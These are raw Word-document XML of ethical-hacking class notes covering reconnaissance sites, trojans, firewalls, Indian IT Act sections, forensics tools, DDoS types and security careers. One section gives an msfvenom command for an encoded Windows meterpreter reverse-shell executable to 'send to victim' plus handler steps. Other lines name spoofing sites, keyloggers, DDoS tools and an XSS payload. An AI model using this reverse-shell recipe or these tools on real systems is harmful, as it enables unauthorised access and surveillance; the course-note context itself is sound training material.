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Hackers Methodology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IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Reconnaissance.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Gather info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IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Finding vulnerabilities, bugs and exploits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IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Gaining access remotely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IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Maintaining access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trojan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IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Covering tracks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Vulnerability assessment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Websites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pipl.com   :shows basic info of people.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netcraft.com      info about websites.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exploit-db.com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certifiedhacker.com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Httracker.com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to get site offline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Whois.domaintolls.com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Foca  used for getting various files from web.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Archive.org (wayback machine)   how did a website looked in the past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Rot13.com     encryption decryption stuff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Hackerone - for bugbounty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Bugcrowd - for bugbounty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Hackernews - news about hacking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Virustotal.com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Ciacybersolutions.com - join this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Tools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Wireshark is a network protocol analyser.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Footprinting through social engg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Dumpster diving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Eavesdropping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Impersonation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Network scanning refers to a set of procedures for identifying hosts ports and services in a network.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HTTP rat acts as a trojan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RAT stands for remote access trojan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When target clicks on file we get remote access.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MOsucker:- trojan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DES data encryption standard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SHA secured hashing algorithm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Hash calc is used to check integrity with help of hash functions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X509 certificate is a structure of digital certificate.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Comodo gives the certificates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GNUPG can make you a certificate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Quick stego Application:- used for steganography.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+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Metasploit is used to find exploit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Ruby and python are used to build an exploit.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Commands for metasploit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Msfvenom -p windows/meterpreter/reverse tcp -e x86/shikata_ga_nai -a x86 -f exe LHOST=ipof receiver LPORT=4444 x &gt; file2.exe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After creation file would be generated in root directory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Copy and send to victim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Step2 start metasploit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Msfconsole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Step3: start explot for reverse connectn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Use mult/handler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Step4 set payload for windows hacking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Set payload windows/meterpreter/reverse_tcp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Step5 set the ip of the host machine in payload creation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Set  LHOST myip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-exploit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KEYLOGGER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Fklogger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Ownspy.com for android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USB dumper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Spybot anti-beacon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Types of firewalls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Packet filtering firewall moitors packets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Application level gateway  can filter packets at the application layer of OSI model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 xml:space="preserve">Circuit level gateway circuit level gateway works at the session layer of the OSI model. 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Making firewall fit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IP address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Domain names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Protocols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Ports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 xml:space="preserve">Pentbox 1.8 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Emkei.cz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email spoofing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Smtp2go.com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email spoofing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 xml:space="preserve">Cross site scripting:- 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Javascript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&lt;script&gt;alert(you are gonna die)&lt;/script&gt;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SQL injections</w:t>
      </w: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Sql magic strings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lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Canarytokens.org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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>IT ACTS</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Section 43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Unauthorised access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Downloading copying extracting information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Introducing viruses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Damaging a comp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Disruption of a computer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Denial of access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Assisting in illegal access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Tampering or manipulating computer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Section 43A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Holds a corporate responsible for the information possessed dealt with or handled by them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Section 65- source code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Section 66- computer related offenses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Covers destruction, deletion, alteration, diminishing,etc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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Data Recovery Tools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Recuva - free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Stellar Phoenix data recovery - paid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Mcase - paid</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Data Sanitisation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Disk wipe - free</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Laptop forensic tools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Nirsoft (Nirlauncher)</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Categories of ddos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Volumetric attacks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Fragmentation attacks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TCP state-Exhausion attacks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Application layer attacks</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DDOS and DOS attack tools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HOIC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LOIC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Kali Linux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Hping3 </w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Security audits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Belarc advisor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  <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Careers in cyber security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Certified Ethical Hacker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Exam cost 35-40k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After completing exam and applying for different jobs as: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Security analyst L1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Security analyst L2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Penetration tester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ESCA, LPT, CHFI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Security consultant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OSCP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Security Auditor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ISO 27001, CISA,CISO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MEET TILVA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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Contact: 9429577900</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>after 7:00 pm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b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">EMAIL: meettilva77@gmail.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">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DEC9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF7DEC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A7F5B"/>
    <w:rsid w:val="03A91891"/>
    <w:rsid w:val="05A3298E"/>
    <w:rsid w:val="06CE565A"/>
    <w:rsid w:val="0C7560B9"/>
    <w:rsid w:val="0E296C47"/>
    <w:rsid w:val="0F611044"/>
    <w:rsid w:val="105D2164"/>
    <w:rsid w:val="180E342F"/>
    <w:rsid w:val="193C2640"/>
    <w:rsid w:val="19C405D5"/>
    <w:rsid w:val="1A917E20"/>
    <w:rsid w:val="1DEF6960"/>
    <w:rsid w:val="1F3B1305"/>
    <w:rsid w:val="222449A2"/>
    <w:rsid w:val="232C2436"/>
    <w:rsid w:val="23E3077D"/>
    <w:rsid w:val="2529172E"/>
    <w:rsid w:val="27481D9E"/>
    <w:rsid w:val="27AA7307"/>
    <w:rsid w:val="2E2A75DD"/>
    <w:rsid w:val="326F4D62"/>
    <w:rsid w:val="32DC57D5"/>
    <w:rsid w:val="36E77F2C"/>
    <w:rsid w:val="390C6BE1"/>
    <w:rsid w:val="3CE3021F"/>
    <w:rsid w:val="409F42A7"/>
    <w:rsid w:val="41946395"/>
    <w:rsid w:val="42FF022D"/>
    <w:rsid w:val="439A7F5B"/>
    <w:rsid w:val="47561C97"/>
    <w:rsid w:val="4B7151DA"/>
    <w:rsid w:val="4B772822"/>
    <w:rsid w:val="4D7F215E"/>
    <w:rsid w:val="4E187E0F"/>
    <w:rsid w:val="4FD437B3"/>
    <w:rsid w:val="54AC1CED"/>
    <w:rsid w:val="55A20979"/>
    <w:rsid w:val="579C13BF"/>
    <w:rsid w:val="57DB1558"/>
    <w:rsid w:val="58F409A1"/>
    <w:rsid w:val="595C2C1C"/>
    <w:rsid w:val="5CFD3B2D"/>
    <w:rsid w:val="5F046CFE"/>
    <w:rsid w:val="668E11E9"/>
    <w:rsid w:val="6A3F2F1E"/>
    <w:rsid w:val="6DD5754F"/>
    <w:rsid w:val="6DE50C39"/>
    <w:rsid w:val="6EB44933"/>
    <w:rsid w:val="6EFC2053"/>
    <w:rsid w:val="70991AAC"/>
    <w:rsid w:val="71734F4A"/>
    <w:rsid w:val="73A03409"/>
    <w:rsid w:val="79C232AD"/>
    <w:rsid w:val="7DD12751"/>
    <w:rsid w:val="7FD3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2018-04-23T05:43:00Z</dcterms:created>
  <dc:creator>RAJAS</dc:creator>
  <cp:lastModifiedBy>RAJAS</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-25T10:14:45Z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